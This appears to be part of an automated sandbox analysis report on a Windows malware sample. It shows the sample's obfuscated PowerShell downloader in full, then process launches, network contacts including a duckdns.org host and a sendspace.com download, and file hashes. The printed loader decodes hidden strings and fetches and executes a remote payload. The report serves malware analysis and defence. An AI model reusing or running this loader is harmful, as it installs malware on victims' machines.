Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.sendspace.com | udp |
| US | 172.67.170.105:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n3.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n3.sendspace.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 172.64.149.23:80 | crt.sectigo.com | tcp |
| US | 8.8.8.8:53 | 105.170.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.136.31.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 172.67.170.105:443 | www.sendspace.com | tcp |
| CA | 69.31.136.17:443 | fs03n3.sendspace.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
| US | 8.8.8.8:53 | 134.180.202.12.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.143.182.52.in-addr.arpa | udp |
Files
memory/2040-2-0x00007FF9F8C03000-0x00007FF9F8C05000-memory.dmp
memory/2040-12-0x000002902AB30000-0x000002902AB52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_invnl4pa.qru.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2040-13-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/2040-14-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4668-23-0x000000007511E000-0x000000007511F000-memory.dmp
memory/4668-24-0x0000000004DB0000-0x0000000004DE6000-memory.dmp
memory/4668-26-0x0000000005420000-0x0000000005A48000-memory.dmp
memory/4668-25-0x0000000075110000-0x00000000758C0000-memory.dmp
memory/4668-27-0x0000000075110000-0x00000000758C0000-memory.dmp
memory/4668-28-0x00000000053A0000-0x00000000053C2000-memory.dmp
memory/4668-29-0x0000000005BC0000-0x0000000005C26000-memory.dmp
memory/4668-30-0x0000000005C70000-0x0000000005CD6000-memory.dmp
memory/4668-36-0x0000000005D20000-0x0000000006074000-memory.dmp
memory/4668-41-0x0000000006340000-0x000000000635E000-memory.dmp
memory/4668-42-0x00000000063D0000-0x000000000641C000-memory.dmp
memory/4668-43-0x0000000007BB0000-0x000000000822A000-memory.dmp
memory/4668-44-0x00000000068C0000-0x00000000068DA000-memory.dmp
memory/4668-45-0x00000000075E0000-0x0000000007676000-memory.dmp
memory/4668-46-0x0000000007570000-0x0000000007592000-memory.dmp
memory/4668-47-0x00000000087E0000-0x0000000008D84000-memory.dmp
C:\Users\Admin\AppData\Roaming\Preaffirmative.Spo
| MD5 | 2012051e619942968ded1f085ec39637 |
| SHA1 | f90b37de2d7d3a42be724ede56fcaebf200b18e8 |
| SHA256 | cb6359c5489ad4e7eabe7ee810752d2ae5d305cf060ad345950cbbc9f9460c82 |
| SHA512 | 17f73368229c4f7daea3ef2d6e1d7ae75b06571ad0576a556b49e50634aa065e49dafa95eb5da4af0d393619abed8a68a92928c5797f240ce799bc93e0aeb053 |
memory/4668-49-0x0000000008D90000-0x000000000A8C6000-memory.dmp
memory/2040-50-0x00007FF9F8C03000-0x00007FF9F8C05000-memory.dmp
memory/2040-51-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4276-69-0x0000000000EC0000-0x0000000000ED6000-memory.dmp
memory/4668-70-0x0000000075110000-0x00000000758C0000-memory.dmp
memory/4276-68-0x0000000000EC0000-0x0000000002114000-memory.dmp
memory/2040-73-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4276-74-0x0000000021D30000-0x0000000021DCC000-memory.dmp